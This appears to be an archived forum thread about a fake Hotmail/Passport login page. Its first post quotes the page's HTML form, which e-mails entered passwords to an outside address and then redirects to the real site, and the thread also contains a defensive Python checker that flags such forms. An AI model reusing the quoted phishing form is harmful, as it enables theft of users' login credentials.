OMFG! HUGE potential "Passport" weakness ???

Poll: OMFG! HUGE potential "Passport" weakness ??? (40 members have voted)

  • This is HUGE. Call Microsoft ASAP.: 1 vote
  • This is pretty serious, but can be controlled.: 6 votes
  • This isn't a big deal.: 4 votes
  • You're on crack. :P: 29 votes

OMFG...my friend scared the s*** out of me tonight. :o He created a web page which appeared to be a hotmail/passport login screen (please re-enter your password). He said he was testing "some spam site" of his, and as soon as I entered my password I got about 20 bazillion XXX popups. :o :mad:

After closing all of those, I looked at the Source code for his page.

The following four lines literally scared me s***less:

(Please note: the URL in the "action" line below is a REDIRECTOR. Do not follow it. This is CODE, So it should not be linkable anyhow. If you follow it, you are a dirty b4st4rd :p)

<pre>
<FORM method=POST action="http://www.join4free.com/?wm=42960">
<input type=hidden name="to" value="x-rated007@excite.com">
<input type=hidden name="subject" value="Hotmail Password">
<input type=hidden name="redir" value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr?disk=&login=&f=0&curmbox=ACTIVE&_lang=&error=4&sec=no&reauth=&id=2&ct=958278062&_lang=&domain=">
</pre>

:o :o :o

Look at that! In those four short lines is the power to do the following:

  • Forward to a specified site
  • Send an email with certain information
  • Use the Microsoft Passport authentication system to retrieve and verify that information.

My friend should be shot for doing this. I have chewed him out, and even after he convinced me that x-rated007@excite.com is his old email, and that he used it just as a joke, I still did NOT think it was funny.

Do you think this is a HUGE weakness in the Passport system? Can it be abused like the AOL pages that prompt the AOLemmings to enter their passwords? Maybe I'm overreacting a bit, but it did scare me a lot. Perhaps it's nothing at all.

What do you think? Let the forum know.


And then?

You can do this with every login system. If the page just looks like Passport, tons of people will fall for it.

How do you think hackers get passwords of lots of people? By faking login sites. If Passport wants you to authenticate, just make sure the address bar says www.passport.com. Coz to get Passport authenticated, the affiliated website redirects you to Passport, which redirects you back to the website once you are authenticated.

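As an added example (not code from the thread or from anyone posting in it), here is a small Python checker that applies the advice in the reply above to the form quoted in the first post: it looks at the host a form really posts to rather than the host it shows, and flags a password form whose action is not a trusted login domain, whose hidden fields mail the submission somewhere, or whose "redir" bounces the user back to the real site afterwards. The trusted host list and the added password field are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the form quoted in the first post, plus the password
# field such a fake login page would have to carry (assumed, not in the post).
SAMPLE_FORM = """
<FORM method=POST action="http://www.join4free.com/?wm=42960">
<input type=hidden name="to" value="x-rated007@excite.com">
<input type=hidden name="subject" value="Hotmail Password">
<input type=hidden name="redir" value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr?error=4">
<input type=password name="passwd">
</FORM>
"""

# Assumed: the only hosts a Passport/Hotmail password should ever be posted to.
LEGIT_HOSTS = ("passport.com", "hotmail.com")


class FormAudit(HTMLParser):
    """Collects each form's action URL and its input tags for inspection."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values are None when absent
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(a)


def is_trusted(host):
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)


def audit(html):
    """Return a list of findings; an empty list means nothing looked wrong."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlsplit(form["action"]).hostname or ""
        types = {(i.get("type") or "text").lower() for i in form["inputs"]}
        hidden = {i.get("name"): i.get("value") or "" for i in form["inputs"]
                  if (i.get("type") or "").lower() == "hidden"}
        redir_host = urlsplit(hidden.get("redir", "")).hostname or ""
        if "password" in types and not is_trusted(host):
            findings.append("password field posts to untrusted host %r" % host)
        if {"to", "subject"} <= hidden.keys() and not is_trusted(host):
            findings.append("hidden mailer fields: submission is e-mailed to %s" % hidden["to"])
        if redir_host and is_trusted(redir_host) and not is_trusted(host):
            findings.append("bounces the user to %r after posting elsewhere" % redir_host)
    return findings
```

Running audit(SAMPLE_FORM) reports all three signs; the same check on a form whose action is really on passport.com reports none.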

EmuZombie:

That was not the URL he gave me. That was a redirect from his page.

Here's the page in question:

http://www.staticfree.net/newbieslair/

It looks convincing to me. The reason I got so upset about this is because Microsoft has tried to make a reasonably secure system. Sure, AOLers are just plain stupid to go to a site asking for their password, but when you have something like this that legitimate businesses are trying to use, couldn't any Joe Schmoe set up a phony passport authentication site?

Furthermore, isn't it possible to make the Address Bar show anything you want? Theoretically, you could just show a long hairy URL that looks authentic to the untrained eye...


Bah, you are saying this like it's something new?

How do you think I found neowin in the first place?

I was bored one day and looked how not to get scammed for this hotmail coding junk.

It brought me to an old neowin news post #60 i think it was. right Neobond? (Back in late May, early June);) ahh those were the days...:disappoin


This topic is now closed to further replies.